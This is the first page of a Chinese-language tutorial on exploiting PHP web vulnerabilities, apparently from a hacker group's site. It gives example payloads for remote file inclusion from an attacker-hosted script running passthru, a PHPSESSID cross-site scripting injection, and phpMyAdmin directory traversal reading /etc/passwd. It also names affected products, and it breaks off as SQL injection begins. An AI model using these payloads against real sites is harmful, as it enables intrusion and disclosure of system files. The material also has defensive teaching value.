從現在的網路安全來看,大家最關注和接觸最多的WEB頁面漏洞應該是ASP了,在這方面,小竹是專家,我沒發言權。然而在PHP方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多。在這裡,就跟大家來稍微的討論一下PHP頁面的相關漏洞吧。
我對目前常見的PHP漏洞做了一下總結,大致分為以下幾種:包含檔案漏洞,指令碼命令執行漏洞,檔案泄露漏洞,SQL注入漏洞等幾種。當然,至於COOKIE欺騙等一部分通用的技術就不在這裡討論了,這些資料網上也很多。那麼,我們就一個一個來分析一下怎樣利用這些漏洞吧!
首先,我們來討論包含檔案漏洞。這個漏洞應該說是PHP專屬的吧。這是由於不充分處理外部提供的惡意資料,從而導致遠程攻擊者可以利用這些漏洞以WEB進程許可權在系統上執行任意命令。我們來看一個例子:假設在a.php中有這樣一句代碼:
以下是引用片段:
include($include."/xxx.php");
?>
在這段代碼中,$include一般是一個已經設定好的路徑,但是我們可以通過自己構造一個路徑來達到攻擊的目的。比方說我們提交:a.php?include=http://web/b.php,這個web是我們用做攻擊的空間,當然,b.php也就是我們用來攻擊的代碼了。我們可以在b.php中寫入類似於:passthru("/bin/ls /etc");的代碼。這樣,就可以執行一些有目的的攻擊了。(注:Web伺服器應該不能執行php代碼,不然就出問題了。相關詳情可以去看<<如何對PHP程式中的常見漏洞進行攻擊>>)。在這個漏洞方面,出狀況的很多,比方說:PayPal Store Front,HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些。
接著,我們再來看一下指令碼命令執行漏洞。這是由於對使用者提交的URI參數缺少充分過濾,提交包含惡意HTML代碼的資料,可導致觸發跨站指令碼攻擊,可能獲得目標使用者的敏感資訊。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的:http://web/index.php?PHPSESSID=">在script裡面我們可以建構函式來獲得使用者的一些敏感資訊。在這個漏洞方面相對要少一點,除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等。
再然後,我們就來看看檔案泄露漏洞了,這種漏洞是由於對使用者提交參數缺少充分過濾,遠程攻擊者可以利用它進行目錄遍曆攻擊以及擷取一些敏感資訊。我們拿最近發現的phpMyAdmin來做例子。在phpMyAdmin中,export.php頁面沒有對使用者提交的'what'參數進行充分過濾,遠程攻擊者提交包含多個'../'字元的資料,便可繞過WEB ROOT限制,以WEB許可權查看系統上的任意檔案資訊。比方說打入這樣一個地址:export.php?what=../../../../../../etc/passwd%00 就可以達到檔案泄露的目的了。在這方面相對多一點,有:myPHPNuke,McNews等等。
最後,我們又要回到最興奮的地方了。想想我們平時在asp頁面中用SQL注入有多麼爽,以前還要手動注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然後再開做出NBSI以後,我們NB聯盟真是拉出一片天空。曾先後幫CSDN,大富翁論壇,中國頻道等大型網站找出漏洞。(這些廢話不多說了,有點跑題了...)。
1 2 3 4 下一頁 >全文閱讀 提示:試試"← →"鍵,翻頁更方便哦!